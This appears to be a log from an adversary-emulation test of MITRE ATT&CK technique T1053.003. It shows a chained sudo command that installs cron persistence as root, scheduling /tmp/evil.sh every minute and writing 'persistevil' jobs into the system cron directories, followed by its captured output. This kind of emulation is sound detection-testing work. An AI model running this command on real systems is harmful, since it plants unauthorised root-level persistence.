[+] Tactic ID   : T1053.003
[+] Technique   : Scheduled Task/Job: Cron
[+] Command     :
sudo systemctl start crond || sudo systemctl start cron && sudo systemctl enable crond || sudo systemctl enable cron && sudo crontab -l > /tmp/notevil && echo '* * * * * /tmp/evil.sh' | sudo tee /tmp/persistevil > /dev/null && sudo crontab /tmp/persistevil && echo "echo 'Hello from SISA Team' > /tmp/SISA.log" | sudo tee /etc/cron.daily/persistevil /etc/cron.hourly/persistevil /etc/cron.monthly/persistevil /etc/cron.weekly/persistevil > /dev/null && echo '*/5 * * * * root echo "Hello from SISA Team" > /tmp/SISA.log' | sudo tee /etc/cron.d/persistevil > /dev/null && echo "echo 'Hello from SISA Team' > /tmp/SISA.log" | sudo tee -a /var/spool/cron/crontabs/persistevil > /dev/null
[+] Success
----- OUTPUT START -----
Failed to start crond.service: Unit crond.service not found.
Failed to enable unit: Unit file crond.service does not exist.
Synchronizing state of cron.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable cron
----- OUTPUT END -----
